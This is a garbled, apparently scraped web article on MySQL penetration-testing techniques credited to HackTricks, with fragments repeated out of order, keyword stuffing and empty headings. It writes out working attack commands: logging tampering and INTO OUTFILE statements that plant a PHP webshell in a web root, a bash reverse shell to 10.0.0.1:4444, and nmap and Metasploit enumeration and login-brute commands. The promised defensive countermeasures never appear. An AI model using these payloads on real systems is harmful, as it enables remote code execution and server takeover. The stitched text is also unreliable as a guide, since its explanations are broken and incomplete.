If secure_file_priv is NULL, you cannot use INTO OUTFILE. However, you can tamper with logs.
SHOW VARIABLES LIKE 'general_log%';
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/mysqlshell.php';
SELECT "<?php system($_GET['cmd']); ?>";
-- The query gets written to the log file as a PHP shell
This is a goldmine for hacktricks users – it bypasses all file restrictions.
Headline: Beyond the Query: A Deep Dive into Verified MySQL Exploitation Techniques
Introduction In the realm of penetration testing, MySQL is one of the most ubiquitous database management systems. While basic SQL Injection focuses on extracting data, "Verified" techniques—often popularized by resources like HackTricks and tools like SQLMap—refer to a higher level of access: Moving from Data Extraction to System Control. mysql hacktricks verified
This feature breaks down the "Verified" MySQL attack chain, explaining how attackers (and auditors) verify configurations to achieve Remote Code Execution (RCE) and system compromise.
-- Write a PHP webshell (if secure_file_priv permits) SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
-- Write a reverse shell script SELECT "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" INTO OUTFILE '/tmp/rev.sh';
Limitations:
Alternative for multi-line:
SELECT GROUP_CONCAT(column) INTO OUTFILE '/tmp/output.txt' FROM table;
In the landscape of penetration testing and red team operations, MySQL remains one of the most ubiquitous relational database management systems. The HackTricks platform, maintained by Carlos Polop, has become a de facto reference for security professionals seeking verified, reproducible attack techniques. When a technique is labeled “HackTricks verified” for MySQL, it implies that the method has been tested, validated, and documented with practical command examples, bypassing theoretical speculation. This essay examines the core verified attack vectors against MySQL, their underlying vulnerabilities, and the essential defensive countermeasures. If secure_file_priv is NULL , you cannot use
Before exploiting, you must enumerate. Nmap is the standard bearer.
Verified Command:
nmap -sV -sC -p 3306 <target-ip> --script mysql*
What to look for:
Pro Tip: Use Metasploit’s auxiliary scanner for speed.
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_login